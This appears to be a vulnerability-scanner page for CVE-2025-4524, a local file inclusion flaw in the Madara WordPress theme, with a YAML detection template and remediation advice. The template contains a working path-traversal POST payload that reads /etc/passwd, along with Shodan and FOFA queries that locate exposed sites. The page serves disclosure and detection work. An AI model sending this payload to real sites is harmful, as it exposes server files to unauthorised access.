WordPress Madara Theme < 2.2.2.1 - Local File Inclusion

CVE-2025-4524
Early Release

Description

The Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter. An unauthenticated attacker can send a crafted request to include and execute arbitrary files on the server.

Severity

High

CVSS Score

9.1

Exploit Probability

4%

Published Date

April 16, 2026

Template Author

0x_akoko

CVE-2025-4524.yaml
id: CVE-2025-4524

info:
  name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
   Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data on the server.
  remediation: |
   Update to the latest version beyond 2.2.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74
    - https://github.com/ptrstr/CVE-2025-4524
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4524
    - https://cxsecurity.com/issue/WLB-2026040012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-4524
    cwe-id: CWE-22
    epss-score: 0.04234
    epss-percentile: 0.88791
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/themes/madara/"
    shodan-query: http.html:"/wp-content/themes/madara/"
  tags: cve,cve2025,wordpress,wp-theme,madara,lfi,unauth

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars[orderby]=meta_value_num&vars[paged]=1&vars[posts_per_page]=16&vars[post_type]=wp-manga&vars[post_status]=publish

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce04f97ca95e65bcf6abba885d3fc506156acf81f747ded9d7032dde6d0ef177022100f8a92a54d5c89f39b1a12c6e7a5bbb2f8ca63432f58a052ef8b6e7a06b627af5:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-4524
CWE ID: CWE-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74
https://github.com/ptrstr/CVE-2025-4524
https://nvd.nist.gov/vuln/detail/CVE-2025-4524
https://cxsecurity.com/issue/WLB-2026040012

Remediation Steps

Update to the latest version beyond 2.2.2.